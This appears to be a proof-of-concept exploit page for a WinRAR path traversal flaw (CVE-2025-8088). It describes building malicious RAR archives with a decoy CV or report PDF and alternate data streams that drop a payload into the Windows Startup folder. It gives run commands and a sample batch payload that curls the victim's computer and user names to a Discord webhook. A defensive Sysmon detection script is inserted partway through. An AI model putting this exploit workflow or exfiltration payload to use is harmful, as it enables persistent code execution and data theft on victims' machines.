CVE-2025-8088 PoC — Path traversal vulnerability in WinRAR

Associated Vulnerability
Title: Path traversal vulnerability in WinRAR (CVE-2025-8088)
Description: A path traversal vulnerability affecting the Windows version of WinRAR allows attackers to execute arbitrary code by crafting malicious archive files. This vulnerability was exploited in the wild and was discovered by Anton Cherepanov, Peter Košinár, and Peter Strýček from ESET.
Readme
# CVE-2025-8088 WinRAR Exploit 🔓

A proof-of-concept exploit for WinRAR vulnerability (CVE-2025-8088) affecting versions 7.12 and lower. This tool creates a malicious RAR archive that embeds payloads in Alternate Data Streams (ADS) with path traversal, potentially leading to arbitrary code execution.

- The issue with many of the other PoCs is that they do not embed multiple ADS streams, so they depend either on luck in having the right path traversal depth or on knowing the exact username/extraction directory.

<p align="center">
  <img src="https://github.com/pentestfunctions/best-CVE-2025-8088/blob/main/assets/winrar_exploit.gif?raw=true">
</p>

## 🚀 How It Works

1. Creates a Decoy Document 📄 - Generates professional-looking PDF (CV or pentest report)
2. Embeds Multiple ADS Streams 🔄 - Attaches payload streams with different path traversal depths
3. Manipulates RAR Headers ⚙️ - Modifies archive structure to exploit path traversal vulnerability
4. Drops Payload to Startup 📂 - Attempts to write payload to Windows startup folder when extracted

## 🛠️ Usage
```bash
# Clone the repository
git clone https://github.com/techcorp/CVE-2025-8088-Exploit.git
cd best-CVE-2025-8088

# Install dependencies
pip install reportlab

# Run the exploit
python CVE-2025-8088-Exploit.py
```
## ✏️ Payload Customization
Edit the payload to call a Discord webhook:

```bash
# Replace the PAYLOAD variable in the script:
PAYLOAD = """@echo off
curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"Extracted on %COMPUTERNAME% by %USERNAME%\"}" YOUR_DISCORD_WEBHOOK_URL
pause
"""
```

Replace YOUR_DISCORD_WEBHOOK_URL with your actual webhook URL.

## 🔄 Execution Flow
1. Victim extracts the RAR with vulnerable WinRAR (≤7.12)
2. Payload gets written to startup folder:
   ```bash
   AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
   ```
3. On next reboot ➡️ payload executes automatically
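
A defender-side check for the execution flow above, added here as an example and not part of the repository: it flags file-creation events in which an archiver process writes into a Startup folder. It assumes Sysmon Event ID 11 (FileCreate) records already parsed into dicts with `UtcTime`, `Image` and `TargetFilename` fields; the archiver list and the sample events are constructed.

```python
import ntpath

# Archive tools whose file writes are examined (assumed list; extend per environment).
ARCHIVERS = {"winrar.exe", "rar.exe", "unrar.exe"}
# Fragment shared by the per-user and all-users Startup folder paths.
STARTUP_FRAGMENT = "\\start menu\\programs\\startup\\"

def normalize(path):
    """Unify separators, collapse ..\\ segments, lowercase for comparison."""
    return ntpath.normpath(path.replace("/", "\\")).lower()

def is_startup_drop(event):
    """True when an archiver process created a file inside a Startup folder."""
    image = ntpath.basename(normalize(event.get("Image", "")))
    target = normalize(event.get("TargetFilename", ""))
    return image in ARCHIVERS and STARTUP_FRAGMENT in target

def find_startup_drops(events):
    """Return (UtcTime, normalized target path) for each matching event."""
    return [(e.get("UtcTime"), normalize(e["TargetFilename"]))
            for e in events if is_startup_drop(e)]

# Constructed sample events (not real telemetry), field names as in Sysmon Event ID 11.
STARTUP = r"AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
SAMPLE_EVENTS = [
    # Archiver writes into the Startup folder: flagged.
    {"UtcTime": "2025-01-01 10:00:01", "Image": r"C:\Program Files\WinRAR\WinRAR.exe",
     "TargetFilename": "C:\\Users\\alice\\" + STARTUP + "\\update.bat"},
    # Same destination logged with unresolved ..\ segments: flagged after normalizing.
    {"UtcTime": "2025-01-01 10:00:02", "Image": r"C:\Program Files\WinRAR\WinRAR.exe",
     "TargetFilename": "C:\\Users\\alice\\Downloads\\cv\\..\\..\\" + STARTUP + "\\update.bat"},
    # Ordinary extraction next to the archive: ignored.
    {"UtcTime": "2025-01-01 10:00:03", "Image": r"C:\Program Files\WinRAR\WinRAR.exe",
     "TargetFilename": r"C:\Users\alice\Downloads\cv\cv.pdf"},
    # Path that leaves Startup again through a ..\ segment: ignored after normalizing.
    {"UtcTime": "2025-01-01 10:00:04", "Image": r"C:\Program Files\WinRAR\WinRAR.exe",
     "TargetFilename": "C:\\Users\\alice\\" + STARTUP + "\\..\\notes.txt"},
    # Non-archiver process creating a Startup shortcut: out of scope for this rule.
    {"UtcTime": "2025-01-01 10:00:05", "Image": r"C:\Windows\explorer.exe",
     "TargetFilename": "C:\\Users\\alice\\" + STARTUP + "\\app.lnk"},
]

if __name__ == "__main__":
    for when, target in find_startup_drops(SAMPLE_EVENTS):
        print(f"[ALERT] {when} archiver wrote to Startup: {target}")
```
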

## 📋 Requirements
- Windows OS 🪟
- Python 3.x 🐍
- WinRAR installed
- ReportLab library (pip install reportlab)
File Snapshot

```
[4.0K] /data/pocs/25736cf59e07314dd3d1fcda303a1364d23a0bb0
├── [4.0K] assets
│   ├── [ 1] info.md
│   └── [7.8M] winrar_exploit.gif
├── [ 29K] CVE-2025-8088.py
├── [2.0K] README.md
└── [ 18] requirements.txt

1 directory, 5 files
```